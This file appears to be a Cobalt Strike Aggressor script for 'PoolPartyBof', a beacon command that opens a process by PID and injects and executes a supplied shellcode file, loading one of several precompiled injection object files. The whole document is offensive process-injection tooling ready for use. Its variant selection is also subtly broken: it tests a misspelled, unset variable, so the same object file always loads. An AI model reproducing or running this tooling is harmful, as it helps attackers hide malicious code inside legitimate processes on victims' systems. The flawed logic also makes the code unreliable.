beacon_command_register (
    "PoolPartyBof",
    "Opens a process (given PID), and injects the shellcode, executes via 5 different Variants.",
    "Synopsis: PoolPartyBof <pid> <Shellcode File> <variant>"
);

alias PoolPartyBof {
    if(size(@_) != 4) {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("PoolPartyBof"));
        return;
    }
    if (size(@_) == 4) {
        $pid = @_[1];
        $ShellcodeFile = @_[2];
        $variant = @_[3];
    }

    local('$barch $handle $data $args');
    $barch = barch($1);
    if ($barch !eq 'x64') {
        berror($1, "Only x64 Supported");
        return;
    }

    if ((!-isnumber $2) || (int($2) <= 0)) {
        berror($1, "Please enter a valid PID");
        return;
    }

    if (!-exists $ShellcodeFile) {
        berror($1, "File doesn't exist");
        return;
    }

    local('$sc_handle $sc_data');
    $sc_handle = openf($ShellcodeFile);
    $sc_data = readb($sc_handle, -1);
    closef($sc_handle);

   if ($Varient == 7) {
        local('$handle $data $args');
        $handle = openf(script_resource("PoolPartyBof_V7.x64.o"));
        $data = readb($handle, -1);
        closef($handle);
   }
   else if ($Varient == 5) {
        local('$handle $data $args');
        $handle = openf(script_resource("PoolPartyBof_V5.x64.o"));
        $data = readb($handle, -1);
        closef($handle);
   }
    else if ($Varient == 4) {
        local('$handle $data $args');
        $handle = openf(script_resource("PoolPartyBof_V4.x64.o"));
        $data = readb($handle, -1);
        closef($handle);
   }
   else if ($Varient == 6) {
        local('$handle $data $args');
        $handle = openf(script_resource("PoolPartyBof_V6.x64.o"));
        $data = readb($handle, -1);
        closef($handle);
   }
   else {
        local('$handle $data $args');
        $handle = openf(script_resource("PoolPartyBof_V8.x64.o"));
        $data = readb($handle, -1);
        closef($handle);
   }

    $args = bof_pack($1, "ib", $pid, $sc_data);
    btask($1, "Opening $pid and running PoolParty ($Varient Varient) with $ShellcodeFile shellcode!");
    beacon_inline_execute($1, $data, "go", $args);
}